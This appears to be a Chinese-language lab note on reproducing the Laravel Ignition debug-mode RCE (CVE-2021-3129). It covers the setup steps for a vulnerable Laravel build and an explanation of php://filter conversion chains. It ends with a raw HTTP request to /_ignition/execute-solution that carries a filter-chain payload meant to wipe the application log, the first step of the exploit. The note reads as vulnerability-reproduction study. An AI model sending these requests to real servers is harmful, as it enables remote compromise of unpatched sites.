Laravel,会将错误写入到日志里storage/log/laravel.log
。
从Laravel 6开始,debug的stack trace由Ignition生成。
步骤:
$ git clone https://github.com/laravel/laravel.git
$ cd laravel
$ git checkout e849812
$ composer install
$ composer require facade/ignition==2.5.1
$ cp ./.env.example ./.env # .env文件必须这里设置了`APP_DEBUG=true`
$ php artisan serve
安装composer:
curl -sS https://getcomposer.org/installer -o composer-setup.php
sudo php composer-setup.php --install-dir=/usr/local/bin --filename=composer
安装php7.3:
参考:https://computingforgeeks.com/how-to-install-php-7-3-on-ubuntu-18-04-ubuntu-16-04-debian/
sudo apt install software-properties-common
sudo add-apt-repository ppa:ondrej/php
sudo apt install php7.3
sudo apt install php7.3-cli php7.3-fpm php7.3-json php7.3-pdo php7.3-mysql php7.3-zip php7.3-gd php7.3-mbstring php7.3-curl php7.3-xml php7.3-bcmath php7.3-json
php7.3安装完成之后,替换默认的php命令为php7.3
给php7.3添加mbstring模块功能:
sudo phpenmod -v 7.3 mbstring
laravel
利用php://filter/
这个协议。
- php://filter/convert.base64-decode/resource=/tmp/file1 对文件内容进行base64解码
- php://filter/read=convert.iconv.utf16le.utf-8/resource=/tmp/test.txt 将某些字符串转换成非ASCII码
参考:
- https://tecadmin.net/enable-disable-php-modules-ubuntu/
情况larvavel的log
POST /_ignition/execute-solution HTTP/1.1
Host: cqq.com:8000
Connection: close
Content-Type: application/json
Content-Length: 275
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "username", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
参考
- 漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现
- https://www.mrkaixin.top/posts/2df9bfb7/